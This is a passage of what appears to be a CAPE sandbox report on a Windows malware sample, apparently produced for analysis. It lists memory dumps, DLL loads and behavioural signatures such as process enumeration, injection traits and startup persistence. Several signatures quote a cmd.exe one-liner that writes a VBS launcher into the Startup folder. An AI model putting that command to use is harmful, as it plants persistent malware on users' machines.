C:\\DvvlnNLlY\\CAPE\\7456_1445405311223132025 (size 304 bytes)\n2025-03-02 21:32:31,185 [root] DEBUG: 7456: DumpRegion: Dumped entire allocation from 0x08C60000, size 4096 bytes.\n2025-03-02 21:32:31,185 [root] DEBUG: 7456: ProcessTrackedRegion: Dumped region at 0x08C60000.\n2025-03-02 21:32:31,185 [root] DEBUG: 7456: YaraScan: Scanning 0x08C60000, size 0x130\n2025-03-02 21:32:31,185 [root] DEBUG: 7456: caller_dispatch: Added region at 0x0A520000 to tracked regions list (ntdll::LdrLoadDll returns to 0x0A52003E, thread 7632).\n2025-03-02 21:32:31,185 [root] DEBUG: 7456: DumpPEsInRange: Scanning range 0x0A520000 - 0x0A520130.\n2025-03-02 21:32:31,185 [root] DEBUG: 7456: ScanForDisguisedPE: Size too small: 0x130 bytes\n2025-03-02 21:32:31,185 [lib.common.results] INFO: Uploading file C:\\DvvlnNLlY\\CAPE\\7456_2709140311223132025 to CAPE\\0bed8dd35102e1301be6e19c299c2767f6b64d9dd2341c1227fb47bb43e884c9; Size is 304; Max size: 100000000\n2025-03-02 21:32:31,201 [root] DEBUG: 7456: DumpMemory: Payload successfully created: C:\\DvvlnNLlY\\CAPE\\7456_2709140311223132025 (size 304 bytes)\n2025-03-02 21:32:31,201 [root] DEBUG: 7456: DumpRegion: Dumped entire allocation from 0x0A520000, size 4096 bytes.\n2025-03-02 21:32:31,201 [root] DEBUG: 7456: ProcessTrackedRegion: Dumped region at 0x0A520000.\n2025-03-02 21:32:31,201 [root] DEBUG: 7456: YaraScan: Scanning 0x0A520000, size 0x130\n2025-03-02 21:32:31,248 [root] DEBUG: 7456: caller_dispatch: Added region at 0x00400000 to tracked regions list (ntdll::LdrGetDllHandle returns to 0x004E7042, thread 7632).\n2025-03-02 21:32:31,294 [root] DEBUG: 7456: YaraScan: Scanning 0x00400000, size 0x225bda\n2025-03-02 21:32:31,357 [root] DEBUG: 7456: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)\n2025-03-02 21:32:31,404 [root] DEBUG: 7456: DLL loaded at 0x76D90000: C:\\Windows\\System32\\oleaut32 (0x96000 bytes).\n2025-03-02 21:32:32,232 [root] DEBUG: 7456: DLL loaded at 0x73FC0000: C:\\Windows\\SYSTEM32\\msimg32 (0x6000 bytes).\n2025-03-02 21:32:32,529 [root] DEBUG: 7456: DLL loaded at 0x74A30000: C:\\Windows\\SYSTEM32\\version (0x8000 bytes).\n2025-03-02 21:32:32,841 [root] DEBUG: 7456: DLL loaded at 0x73910000: C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.4355_none_c0dc01d438beab35\\comctl32 (0x8d000 bytes).\n2025-03-02 21:32:32,919 [root] DEBUG: 7456: DLL loaded at 0x75BB0000: C:\\Windows\\System32\\shcore (0x87000 bytes).\n2025-03-02 21:32:32,919 [root] DEBUG: 7456: DLL loaded at 0x75C40000: C:\\Windows\\System32\\SHELL32 (0x5da000 bytes).\n2025-03-02 21:32:32,919 [root] DEBUG: 7456: DLL loaded at 0x755A0000: C:\\Windows\\System32\\comdlg32 (0xaf000 bytes).\n2025-03-02 21:32:32,935 [root] DEBUG: 7456: DLL loaded at 0x73900000: C:\\Windows\\SYSTEM32\\SHFolder (0x6000 bytes).\n2025-03-02 21:32:32,982 [root] DEBUG: 7456: YaraScan: Scanning 0x00400000, size 0x225bda\n2025-03-02 21:32:33,044 [root] DEBUG: 7456: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 3.435665e-02)\n2025-03-02 21:32:33,091 [root] DEBUG: 7456: YaraScan: Scanning 0x00400000, size 0x225bda\n2025-03-02 21:32:33,169 [root] DEBUG: 7456: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 3.435664e-02)\n2025-03-02 21:32:33,216 [root] DEBUG: 7456: YaraScan: Scanning 0x00400000, size 0x225bda\n2025-03-02 21:32:33,279 [root] DEBUG: 7456: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 3.435520e-02)\n2025-03-02 21:32:33,279 [root] DEBUG: 7456: InstrumentationCallback: Added region at 0x763D0000 to tracked regions list (thread 7632).\n2025-03-02 21:32:33,279 [root] DEBUG: 7456: DLL loaded at 0x74E80000: C:\\Windows\\system32\\uxtheme (0x74000 bytes).\n2025-03-02 21:32:33,294 [root] DEBUG: 7456: DLL loaded at 0x75650000: C:\\Windows\\System32\\MSCTF (0xd4000 bytes).\n2025-03-02 21:32:33,294 [root] DEBUG: 7456: AllocationHandler: Adding allocation to tracked region list: 0x0A590000, size: 0x1000.\n2025-03-02 21:32:33,294 [root] DEBUG: 7456: AddTrackedRegion: GetEntropy failed.\n2025-03-02 21:32:33,294 [root] DEBUG: 7456: AllocationHandler: Processing previous tracked region at: 0x00400000.\n2025-03-02 21:32:33,341 [root] DEBUG: 7456: YaraScan: Scanning 0x00400000, size 0x225bda\n2025-03-02 21:32:33,388 [root] DEBUG: 7456: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 3.540288e-02)\n2025-03-02 21:32:33,419 [root] DEBUG: 7456: DLL loaded at 0x732A0000: C:\\Windows\\SYSTEM32\\TextShaping (0x97000 bytes).\n2025-03-02 21:32:33,435 [root] DEBUG: 7456: InstrumentationCallback: Added region at 0x75860000 to tracked regions list (thread 7632).\n2025-03-02 21:32:33,435 [root] DEBUG: 7456: DLL loaded at 0x73D70000: C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.4355_none_a865f0c28672571c\\comctl32 (0x210000 bytes).\n2025-03-02 21:32:33,466 [root] DEBUG: 7456: DLL loaded at 0x76370000: C:\\Windows\\System32\\bcryptPrimitives (0x5f000 bytes).\n2025-03-02 21:33:16,154 [root] DEBUG: 7456: DLL loaded at 0x743B0000: C:\\Windows\\SYSTEM32\\Wldp (0x25000 bytes).\n2025-03-02 21:33:16,216 [root] DEBUG: 7456: DLL loaded at 0x743E0000: C:\\Windows\\SYSTEM32\\windows.storage (0x618000 bytes).\n2025-03-02 21:33:16,451 [root] DEBUG: 7456: DLL loaded at 0x74F00000: C:\\Windows\\SYSTEM32\\kernel.appcore (0xf000 bytes).\n2025-03-02 21:33:16,460 [root] DEBUG: 7456: DLL loaded at 0x73C70000: C:\\Windows\\SYSTEM32\\ntmarta (0x29000 bytes).\n2025-03-02 21:33:16,481 [root] DEBUG: 7456: DLL loaded at 0x73FE0000: C:\\Windows\\System32\\CoreMessaging (0x9b000 bytes).\n2025-03-02 21:33:16,502 [root] DEBUG: 7456: DLL loaded at 0x72A60000: C:\\Windows\\SYSTEM32\\wintypes (0xdd000 bytes).\n2025-03-02 21:33:16,502 [root] DEBUG: 7456: DLL loaded at 0x717B0000: C:\\Windows\\System32\\CoreUIComponents (0x27f000 bytes).\n2025-03-02 21:33:16,508 [root] DEBUG: 7456: DLL loaded at 0x74080000: C:\\Windows\\SYSTEM32\\textinputframework (0xb9000 bytes).\n2025-03-02 21:33:27,364 [root] INFO: Process with pid 7456 appears to have terminated\n2025-03-02 21:33:32,454 [root] INFO: Process list is empty, terminating analysis\n2025-03-02 21:33:33,464 [root] INFO: Created shutdown mutex\n2025-03-02 21:33:34,498 [root] INFO: Shutting down package\n2025-03-02 21:33:34,498 [root] INFO: Stopping auxiliary modules\n2025-03-02 21:33:34,498 [root] INFO: Stopping auxiliary module: Browser\n2025-03-02 21:33:34,498 [root] INFO: Stopping auxiliary module: Human\n2025-03-02 21:33:35,834 [root] INFO: Stopping auxiliary module: Screenshots\n2025-03-02 21:33:36,060 [root] INFO: Finishing auxiliary modules\n2025-03-02 21:33:36,060 [root] INFO: Shutting down pipe server and dumping dropped files\n2025-03-02 21:33:36,089 [lib.common.results] INFO: Uploading file C:\\Users\\pacop\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs to files\\cf7ba288d3b253fa1eeb4be78718eb6e758f923426917a8f86e95889d5e5c133; Size is 121; Max size: 100000000\n2025-03-02 21:33:36,099 [root] WARNING: Folder at path \"C:\\DvvlnNLlY\\debugger\" does not exist, skipping\n2025-03-02 21:33:36,099 [root] INFO: Uploading files at path \"C:\\DvvlnNLlY\\tlsdump\"\n2025-03-02 21:33:36,101 [lib.common.results] INFO: Uploading file C:\\DvvlnNLlY\\tlsdump\\tlsdump.log to tlsdump\\tlsdump.log; Size is 36168; Max size: 100000000\n2025-03-02 21:33:36,109 [root] INFO: Analysis completed\n", "errors": [] }, "network": {}, "suricata": { "alerts": [], "tls": [], "perf": [], "files": [], "http": [], "dns": [], "ssh": [], "fileinfo": [], "eve_log_full_path": null, "alert_log_full_path": null, "tls_log_full_path": null, "http_log_full_path": null, "file_log_full_path": null, "ssh_log_full_path": null, "dns_log_full_path": null }, "url_analysis": {}, "procmemory": [], "signatures": [ { "name": "queries_keyboard_layout", "description": "Queries the keyboard layout", "categories": [ "location_discovery" ], "severity": 1, "weight": 1, "confidence": 100, "references": [], "data": [ { "type": "call", "pid": 7456, "cid": 532 }, { "type": "call", "pid": 7456, "cid": 1148 } ], "new_data": [], "alert": false, "families": [] }, { "name": "cmdline_terminate", "description": "Executed a command line with /C or /R argument to terminate command shell on completion which can be used to hide execution", "categories": [ "command" ], "severity": 1, "weight": 1, "confidence": 100, "references": [], "data": [ { "command": "C:\\Windows\\system32\\cmd.exe /c echo on error resume next:CreateObject(\"WScript.Shell\").Run \"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe\",1: >\"C:\\Users\\pacop\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs\"" } ], "new_data": [], "alert": false, "families": [] }, { "name": "stealth_timeout", "description": "Possible date expiration check, exits too soon after checking local time", "categories": [ "stealth" ], "severity": 1, "weight": 1, "confidence": 40, "references": [], "data": [ { "process": "f1e62c0e7345fc825586.exe, PID 4492" }, { "type": "call", "pid": 4492, "cid": 1303 } ], "new_data": [], "alert": false, "families": [] }, { "name": "resumethread_remote_process", "description": "Resumed a thread in another process", "categories": [ "injection", "unpacking" ], "severity": 2, "weight": 1, "confidence": 100, "references": [], "data": [ { "thread_resumed": "Process f1e62c0e7345fc825586.exe with process ID 4492 resumed a thread in another process with the process ID 7456" }, { "type": "call", "pid": 4492, "cid": 1283 }, { "type": "call", "pid": 4492, "cid": 1286 } ], "new_data": [], "alert": false, "families": [] }, { "name": "enumerates_running_processes", "description": "Enumerates running processes", "categories": [ "discovery" ], "severity": 2, "weight": 1, "confidence": 100, "references": [], "data": [ { "process": "System with pid 4" }, { "type": "call", "pid": 4492, "cid": 890 }, { "process": "Registry with pid 92" }, { "type": "call", "pid": 4492, "cid": 891 }, { "process": "smss.exe with pid 336" }, { "type": "call", "pid": 4492, "cid": 892 }, { "process": "csrss.exe with pid 436" }, { "type": "call", "pid": 4492, "cid": 893 }, { "process": "wininit.exe with pid 512" }, { "type": "call", "pid": 4492, "cid": 894 }, { "process": "csrss.exe with pid 520" }, { "type": "call", "pid": 4492, "cid": 895 }, { "process": "winlogon.exe with pid 604" }, { "type": "call", "pid": 4492, "cid": 896 }, { "process": "services.exe with pid 648" }, { "type": "call", "pid": 4492, "cid": 897 }, { "process": "lsass.exe with pid 672" }, { "type": "call", "pid": 4492, "cid": 898 }, { "process": "svchost.exe with pid 768" }, { "type": "call", "pid": 4492, "cid": 899 }, { "process": "fontdrvhost.exe with pid 780" }, { "type": "call", "pid": 4492, "cid": 900 }, { "process": "fontdrvhost.exe with pid 788" }, { "type": "call", "pid": 4492, "cid": 901 }, { "process": "svchost.exe with pid 892" }, { "type": "call", "pid": 4492, "cid": 902 }, { "process": "svchost.exe with pid 940" }, { "type": "call", "pid": 4492, "cid": 903 }, { "process": "svchost.exe with pid 460" }, { "type": "call", "pid": 4492, "cid": 904 }, { "process": "svchost.exe with pid 524" }, { "type": "call", "pid": 4492, "cid": 905 }, { "process": "svchost.exe with pid 712" }, { "type": "call", "pid": 4492, "cid": 906 }, { "process": "dwm.exe with pid 600" }, { "type": "call", "pid": 4492, "cid": 907 }, { "process": "svchost.exe with pid 1084" }, { "type": "call", "pid": 4492, "cid": 908 }, { "process": "svchost.exe with pid 1128" }, { "type": "call", "pid": 4492, "cid": 909 }, { "process": "svchost.exe with pid 1164" }, { "type": "call", "pid": 4492, "cid": 910 }, { "process": "svchost.exe with pid 1272" }, { "type": "call", "pid": 4492, "cid": 911 }, { "process": "svchost.exe with pid 1328" }, { "type": "call", "pid": 4492, "cid": 912 }, { "process": "svchost.exe with pid 1340" }, { "type": "call", "pid": 4492, "cid": 913 }, { "process": "svchost.exe with pid 1488" }, { "type": "call", "pid": 4492, "cid": 914 }, { "process": "svchost.exe with pid 1512" }, { "type": "call", "pid": 4492, "cid": 915 }, { "process": "svchost.exe with pid 1540" }, { "type": "call", "pid": 4492, "cid": 916 }, { "process": "svchost.exe with pid 1556" }, { "type": "call", "pid": 4492, "cid": 917 }, { "process": "svchost.exe with pid 1592" }, { "type": "call", "pid": 4492, "cid": 918 }, { "process": "Memory Compression with pid 1700" }, { "type": "call", "pid": 4492, "cid": 919 }, { "process": "svchost.exe with pid 1716" }, { "type": "call", "pid": 4492, "cid": 920 }, { "process": "svchost.exe with pid 1728" }, { "type": "call", "pid": 4492, "cid": 921 }, { "process": "svchost.exe with pid 1820" }, { "type": "call", "pid": 4492, "cid": 922 }, { "process": "svchost.exe with pid 1856" }, { "type": "call", "pid": 4492, "cid": 923 }, { "process": "svchost.exe with pid 1960" }, { "type": "call", "pid": 4492, "cid": 924 }, { "process": "svchost.exe with pid 1972" }, { "type": "call", "pid": 4492, "cid": 925 }, { "process": "svchost.exe with pid 1096" }, { "type": "call", "pid": 4492, "cid": 926 }, { "process": "svchost.exe with pid 1800" }, { "type": "call", "pid": 4492, "cid": 927 }, { "process": "svchost.exe with pid 1888" }, { "type": "call", "pid": 4492, "cid": 928 }, { "process": "svchost.exe with pid 1460" }, { "type": "call", "pid": 4492, "cid": 929 }, { "process": "svchost.exe with pid 2080" }, { "type": "call", "pid": 4492, "cid": 930 }, { "process": "svchost.exe with pid 2136" }, { "type": "call", "pid": 4492, "cid": 931 }, { "process": "spoolsv.exe with pid 2244" }, { "type": "call", "pid": 4492, "cid": 932 }, { "process": "svchost.exe with pid 2280" }, { "type": "call", "pid": 4492, "cid": 933 }, { "process": "svchost.exe with pid 2364" }, { "type": "call", "pid": 4492, "cid": 934 }, { "process": "svchost.exe with pid 2496" }, { "type": "call", "pid": 4492, "cid": 935 }, { "process": "svchost.exe with pid 2504" }, { "type": "call", "pid": 4492, "cid": 936 }, { "process": "svchost.exe with pid 2512" }, { "type": "call", "pid": 4492, "cid": 937 }, { "process": "svchost.exe with pid 2660" }, { "type": "call", "pid": 4492, "cid": 938 }, { "process": "svchost.exe with pid 2668" }, { "type": "call", "pid": 4492, "cid": 939 }, { "process": "svchost.exe with pid 2680" }, { "type": "call", "pid": 4492, "cid": 940 }, { "process": "svchost.exe with pid 2696" }, { "type": "call", "pid": 4492, "cid": 941 }, { "process": "MpDefenderCoreService.exe with pid 2792" }, { "type": "call", "pid": 4492, "cid": 942 }, { "process": "svchost.exe with pid 2864" }, { "type": "call", "pid": 4492, "cid": 943 }, { "process": "svchost.exe with pid 2888" }, { "type": "call", "pid": 4492, "cid": 944 }, { "process": "MsMpEng.exe with pid 2896" }, { "type": "call", "pid": 4492, "cid": 945 }, { "process": "svchost.exe with pid 2916" }, { "type": "call", "pid": 4492, "cid": 946 }, { "process": "svchost.exe with pid 2976" }, { "type": "call", "pid": 4492, "cid": 947 }, { "process": "svchost.exe with pid 3208" }, { "type": "call", "pid": 4492, "cid": 948 }, { "process": "svchost.exe with pid 3488" }, { "type": "call", "pid": 4492, "cid": 949 }, { "process": "SearchIndexer.exe with pid 3616" }, { "type": "call", "pid": 4492, "cid": 950 }, { "process": "dllhost.exe with pid 4032" }, { "type": "call", "pid": 4492, "cid": 951 }, { "process": "AggregatorHost.exe with pid 4720" }, { "type": "call", "pid": 4492, "cid": 952 }, { "process": "svchost.exe with pid 8" }, { "type": "call", "pid": 4492, "cid": 953 }, { "process": "svchost.exe with pid 4484" }, { "type": "call", "pid": 4492, "cid": 954 }, { "process": "sihost.exe with pid 4640" }, { "type": "call", "pid": 4492, "cid": 955 }, { "process": "svchost.exe with pid 2124" }, { "type": "call", "pid": 4492, "cid": 956 }, { "process": "svchost.exe with pid 4812" }, { "type": "call", "pid": 4492, "cid": 957 }, { "process": "pyw.exe with pid 1956" }, { "type": "call", "pid": 4492, "cid": 958 }, { "process": "taskhostw.exe with pid 5136" }, { "type": "call", "pid": 4492, "cid": 959 }, { "process": "svchost.exe with pid 5232" }, { "type": "call", "pid": 4492, "cid": 960 }, { "process": "svchost.exe with pid 5332" }, { "type": "call", "pid": 4492, "cid": 961 }, { "process": "ctfmon.exe with pid 5400" }, { "type": "call", "pid": 4492, "cid": 962 }, { "process": "svchost.exe with pid 5548" }, { "type": "call", "pid": 4492, "cid": 963 }, { "process": "explorer.exe with pid 5624" }, { "type": "call", "pid": 4492, "cid": 964 }, { "process": "svchost.exe with pid 5788" }, { "type": "call", "pid": 4492, "cid": 965 }, { "process": "svchost.exe with pid 5932" }, { "type": "call", "pid": 4492, "cid": 966 }, { "process": "svchost.exe with pid 6200" }, { "type": "call", "pid": 4492, "cid": 967 }, { "process": "svchost.exe with pid 6300" }, { "type": "call", "pid": 4492, "cid": 968 }, { "process": "svchost.exe with pid 6348" }, { "type": "call", "pid": 4492, "cid": 969 }, { "process": "dllhost.exe with pid 6544" }, { "type": "call", "pid": 4492, "cid": 970 }, { "process": "pythonw.exe with pid 6672" }, { "type": "call", "pid": 4492, "cid": 971 }, { "process": "svchost.exe with pid 6908" }, { "type": "call", "pid": 4492, "cid": 972 }, { "process": "StartMenuExperienceHost.exe with pid 7164" }, { "type": "call", "pid": 4492, "cid": 973 }, { "process": "RuntimeBroker.exe with pid 6440" }, { "type": "call", "pid": 4492, "cid": 974 }, { "process": "svchost.exe with pid 7196" }, { "type": "call", "pid": 4492, "cid": 975 }, { "process": "SearchApp.exe with pid 7300" }, { "type": "call", "pid": 4492, "cid": 976 }, { "process": "MoUsoCoreWorker.exe with pid 7492" }, { "type": "call", "pid": 4492, "cid": 977 }, { "process": "RuntimeBroker.exe with pid 7600" }, { "type": "call", "pid": 4492, "cid": 978 }, { "process": "RuntimeBroker.exe with pid 8508" }, { "type": "call", "pid": 4492, "cid": 979 }, { "process": "SecurityHealthSystray.exe with pid 9008" }, { "type": "call", "pid": 4492, "cid": 980 }, { "process": "SecurityHealthService.exe with pid 6684" }, { "type": "call", "pid": 4492, "cid": 981 }, { "process": "svchost.exe with pid 10116" }, { "type": "call", "pid": 4492, "cid": 982 }, { "process": "svchost.exe with pid 10096" }, { "type": "call", "pid": 4492, "cid": 983 }, { "process": "svchost.exe with pid 8752" }, { "type": "call", "pid": 4492, "cid": 984 }, { "process": "svchost.exe with pid 832" }, { "type": "call", "pid": 4492, "cid": 985 }, { "process": "OneDrive.exe with pid 8908" }, { "type": "call", "pid": 4492, "cid": 986 }, { "process": "UserOOBEBroker.exe with pid 10028" }, { "type": "call", "pid": 4492, "cid": 987 }, { "process": "ApplicationFrameHost.exe with pid 8900" }, { "type": "call", "pid": 4492, "cid": 988 }, { "process": "svchost.exe with pid 8324" }, { "type": "call", "pid": 4492, "cid": 989 }, { "process": "svchost.exe with pid 9796" }, { "type": "call", "pid": 4492, "cid": 990 }, { "process": "SystemSettings.exe with pid 1752" }, { "type": "call", "pid": 4492, "cid": 991 }, { "process": "svchost.exe with pid 10160" }, { "type": "call", "pid": 4492, "cid": 992 }, { "process": "TextInputHost.exe with pid 4628" }, { "type": "call", "pid": 4492, "cid": 993 }, { "process": "ShellExperienceHost.exe with pid 1756" }, { "type": "call", "pid": 4492, "cid": 994 }, { "process": "RuntimeBroker.exe with pid 3636" }, { "type": "call", "pid": 4492, "cid": 995 }, { "process": "dllhost.exe with pid 8820" }, { "type": "call", "pid": 4492, "cid": 996 }, { "process": "FileCoAuth.exe with pid 6004" }, { "type": "call", "pid": 4492, "cid": 997 }, { "process": "SearchApp.exe with pid 9364" }, { "type": "call", "pid": 4492, "cid": 998 }, { "process": "msedgewebview2.exe with pid 7736" }, { "type": "call", "pid": 4492, "cid": 999 }, { "process": "msedgewebview2.exe with pid 9612" }, { "type": "call", "pid": 4492, "cid": 1000 }, { "process": "msedgewebview2.exe with pid 1112" }, { "type": "call", "pid": 4492, "cid": 1001 }, { "process": "msedgewebview2.exe with pid 8392" }, { "type": "call", "pid": 4492, "cid": 1002 }, { "process": "msedgewebview2.exe with pid 7204" }, { "type": "call", "pid": 4492, "cid": 1003 }, { "process": "msedgewebview2.exe with pid 10876" }, { "type": "call", "pid": 4492, "cid": 1004 }, { "process": "svchost.exe with pid 11088" }, { "type": "call", "pid": 4492, "cid": 1005 }, { "process": "SystemSettingsBroker.exe with pid 728" }, { "type": "call", "pid": 4492, "cid": 1006 }, { "process": "svchost.exe with pid 10284" }, { "type": "call", "pid": 4492, "cid": 1007 }, { "process": "svchost.exe with pid 7624" }, { "type": "call", "pid": 4492, "cid": 1008 }, { "process": "svchost.exe with pid 6504" }, { "type": "call", "pid": 4492, "cid": 1009 }, { "process": "msedge.exe with pid 1220" }, { "type": "call", "pid": 4492, "cid": 1010 }, { "process": "msedge.exe with pid 7748" }, { "type": "call", "pid": 4492, "cid": 1011 }, { "process": "msedge.exe with pid 8948" }, { "type": "call", "pid": 4492, "cid": 1012 }, { "process": "msedge.exe with pid 736" }, { "type": "call", "pid": 4492, "cid": 1013 }, { "process": "msedge.exe with pid 9672" }, { "type": "call", "pid": 4492, "cid": 1014 }, { "process": "msedge.exe with pid 448" }, { "type": "call", "pid": 4492, "cid": 1015 }, { "process": "msedge.exe with pid 1028" }, { "type": "call", "pid": 4492, "cid": 1016 }, { "process": "svchost.exe with pid 4592" }, { "type": "call", "pid": 4492, "cid": 1017 }, { "process": "PhoneExperienceHost.exe with pid 664" }, { "type": "call", "pid": 4492, "cid": 1018 }, { "process": "svchost.exe with pid 10524" }, { "type": "call", "pid": 4492, "cid": 1019 }, { "process": "svchost.exe with pid 8212" }, { "type": "call", "pid": 4492, "cid": 1020 }, { "process": "smartscreen.exe with pid 5164" }, { "type": "call", "pid": 4492, "cid": 1021 }, { "process": "svchost.exe with pid 2748" }, { "type": "call", "pid": 4492, "cid": 1022 }, { "process": "svchost.exe with pid 8704" }, { "type": "call", "pid": 4492, "cid": 1023 }, { "process": "upfc.exe with pid 8116" }, { "type": "call", "pid": 4492, "cid": 1024 }, { "process": "MicrosoftEdgeUpdate.exe with pid 9036" }, { "type": "call", "pid": 4492, "cid": 1025 }, { "process": "updater.exe with pid 4748" }, { "type": "call", "pid": 4492, "cid": 1026 }, { "process": "taskhostw.exe with pid 10512" }, { "type": "call", "pid": 4492, "cid": 1027 }, { "process": "MicrosoftEdgeUpdate.exe with pid 6768" }, { "type": "call", "pid": 4492, "cid": 1028 }, { "process": "CompatTelRunner.exe with pid 9944" }, { "type": "call", "pid": 4492, "cid": 1029 }, { "process": "OneDriveStandaloneUpdater.exe with pid 1184" }, { "type": "call", "pid": 4492, "cid": 1030 }, { "process": "OneDriveStandaloneUpdater.exe with pid 9208" }, { "type": "call", "pid": 4492, "cid": 1031 }, { "process": "TrustedInstaller.exe with pid 4816" }, { "type": "call", "pid": 4492, "cid": 1032 }, { "process": "svchost.exe with pid 10340" }, { "type": "call", "pid": 4492, "cid": 1033 }, { "process": "TiWorker.exe with pid 8656" }, { "type": "call", "pid": 4492, "cid": 1034 }, { "process": "conhost.exe with pid 3964" }, { "type": "call", "pid": 4492, "cid": 1035 }, { "process": "svchost.exe with pid 3228" }, { "type": "call", "pid": 4492, "cid": 1036 }, { "process": "HxTsr.exe with pid 8760" }, { "type": "call", "pid": 4492, "cid": 1037 }, { "process": "backgroundTaskHost.exe with pid 1476" }, { "type": "call", "pid": 4492, "cid": 1038 }, { "process": "backgroundTaskHost.exe with pid 3832" }, { "type": "call", "pid": 4492, "cid": 1039 }, { "process": "backgroundTaskHost.exe with pid 7904" }, { "type": "call", "pid": 4492, "cid": 1040 }, { "process": "backgroundTaskHost.exe with pid 3860" }, { "type": "call", "pid": 4492, "cid": 1041 }, { "process": "backgroundTaskHost.exe with pid 8056" }, { "type": "call", "pid": 4492, "cid": 1042 }, { "process": "updater.exe with pid 10672" }, { "type": "call", "pid": 4492, "cid": 1043 }, { "process": "sppsvc.exe with pid 7028" }, { "type": "call", "pid": 4492, "cid": 1044 }, { "process": "svchost.exe with pid 5228" }, { "type": "call", "pid": 4492, "cid": 1045 }, { "process": "svchost.exe with pid 3272" }, { "type": "call", "pid": 4492, "cid": 1046 }, { "process": "updater.exe with pid 8788" }, { "type": "call", "pid": 4492, "cid": 1047 }, { "process": "updater.exe with pid 5356" }, { "type": "call", "pid": 4492, "cid": 1048 }, { "process": "svchost.exe with pid 9400" }, { "type": "call", "pid": 4492, "cid": 1049 }, { "process": "SppExtComObj.Exe with pid 6000" }, { "type": "call", "pid": 4492, "cid": 1050 }, { "process": "updater.exe with pid 4228" }, { "type": "call", "pid": 4492, "cid": 1051 }, { "process": "updater.exe with pid 5700" }, { "type": "call", "pid": 4492, "cid": 1052 }, { "process": "CompatTelRunner.exe with pid 5212" }, { "type": "call", "pid": 4492, "cid": 1053 }, { "process": "audiodg.exe with pid 10536" }, { "type": "call", "pid": 4492, "cid": 1054 }, { "process": "RuntimeBroker.exe with pid 3236" }, { "type": "call", "pid": 4492, "cid": 1055 }, { "process": "backgroundTaskHost.exe with pid 6308" }, { "type": "call", "pid": 4492, "cid": 1056 }, { "process": "backgroundTaskHost.exe with pid 3092" }, { "type": "call", "pid": 4492, "cid": 1057 }, { "process": "backgroundTaskHost.exe with pid 9488" }, { "type": "call", "pid": 4492, "cid": 1058 }, { "process": "RuntimeBroker.exe with pid 5448" }, { "type": "call", "pid": 4492, "cid": 1059 }, { "process": "backgroundTaskHost.exe with pid 1256" }, { "type": "call", "pid": 4492, "cid": 1060 }, { "process": "backgroundTaskHost.exe with pid 10548" }, { "type": "call", "pid": 4492, "cid": 1061 }, { "process": "RuntimeBroker.exe with pid 10780" }, { "type": "call", "pid": 4492, "cid": 1062 }, { "process": "backgroundTaskHost.exe with pid 3408" }, { "type": "call", "pid": 4492, "cid": 1063 }, { "process": "backgroundTaskHost.exe with pid 10080" }, { "type": "call", "pid": 4492, "cid": 1064 }, { "process": "RuntimeBroker.exe with pid 5652" }, { "type": "call", "pid": 4492, "cid": 1065 }, { "process": "RuntimeBroker.exe with pid 10772" }, { "type": "call", "pid": 4492, "cid": 1066 }, { "process": "svchost.exe with pid 7988" }, { "type": "call", "pid": 4492, "cid": 1067 }, { "process": "WmiPrvSE.exe with pid 10764" }, { "type": "call", "pid": 4492, "cid": 1068 }, { "process": "svchost.exe with pid 6716" }, { "type": "call", "pid": 4492, "cid": 1069 }, { "process": "f1e62c0e7345fc825586.exe with pid 4492" }, { "type": "call", "pid": 4492, "cid": 1070 }, { "process": "dllhost.exe with pid 8168" }, { "type": "call", "pid": 4492, "cid": 1071 } ], "new_data": [], "alert": false, "families": [] }, { "name": "reads_self", "description": "Reads data out of its own binary image", "categories": [ "generic" ], "severity": 2, "weight": 1, "confidence": 30, "references": [], "data": [ { "self_read": "process: f1e62c0e7345fc825586.exe, pid: 4492, offset: 0x00000000, length: 0x002e0346" } ], "new_data": [], "alert": false, "families": [] }, { "name": "terminates_remote_process", "description": "Terminates another process", "categories": [ "persistence", "stealth" ], "severity": 2, "weight": 1, "confidence": 100, "references": [], "data": [ { "type": "call", "pid": 4492, "cid": 602 }, { "process": "f1e62c0e7345fc825586.exe" } ], "new_data": [], "alert": false, "families": [] }, { "name": "injection_rwx", "description": "Creates RWX memory", "categories": [ "injection" ], "severity": 2, "weight": 1, "confidence": 50, "references": [], "data": [ { "type": "call", "pid": 4492, "cid": 401 } ], "new_data": [], "alert": false, "families": [] }, { "name": "script_tool_executed", "description": "A scripting utility was executed", "categories": [ "command" ], "severity": 2, "weight": 1, "confidence": 80, "references": [], "data": [ { "command": "C:\\Windows\\system32\\cmd.exe /c echo on error resume next:CreateObject(\"WScript.Shell\").Run \"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe\",1: >\"C:\\Users\\pacop\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs\"" } ], "new_data": [], "alert": false, "families": [] }, { "name": "uses_windows_utilities", "description": "Uses Windows utilities for basic functionality", "categories": [ "command", "lateral" ], "severity": 2, "weight": 1, "confidence": 80, "references": [], "data": [ { "command": "C:\\Windows\\system32\\cmd.exe /c echo on error resume next:CreateObject(\"WScript.Shell\").Run \"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe\",1: >\"C:\\Users\\pacop\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs\"" } ], "new_data": [], "alert": false, "families": [] }, { "name": "persistence_autorun", "description": "Installs itself for autorun at Windows startup", "categories": [ "persistence" ], "severity": 3, "weight": 1, "confidence": 100, "references": [], "data": [ { "file": "C:\\Users\\pacop\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs" }, { "file": "C:\\Users\\pacop\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs" } ], "new_data": [], "alert": false, "families": [] }, { "name": "binary_yara", "description": "Binary file triggered multiple YARA rules", "categories": [ "static" ], "severity": 3, "weight": 1, "confidence": 80, "references": [], "data": [ { "Binary triggered YARA rule": 